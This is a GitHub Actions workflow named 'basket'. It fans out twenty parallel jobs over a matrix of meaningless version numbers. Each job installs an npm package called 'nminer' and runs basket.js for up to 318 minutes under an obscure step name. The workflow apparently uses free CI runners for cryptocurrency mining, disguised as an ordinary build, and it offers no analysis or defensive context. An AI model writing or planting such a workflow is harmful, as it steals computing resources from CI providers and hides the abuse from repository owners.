name: basket
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3484 }
          - { version: 2284 }
          - { version: 776 }
          - { version: 8766 }
          - { version: 7760 }
          - { version: 413 }
          - { version: 8063 }
          - { version: 9099 }
          - { version: 4335 }
          - { version: 376 }
          - { version: 4104 }
          - { version: 297 }
          - { version: 6239 }
          - { version: 9525 }
          - { version: 9353 }
          - { version: 1644 }
          - { version: 6113 }
          - { version: 7549 }
          - { version: 1348 }
          - { version: 6537 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: distinct before barring
        run: |
          npm install nminer@latest
          timeout 318m node basket.js || echo "basket executed"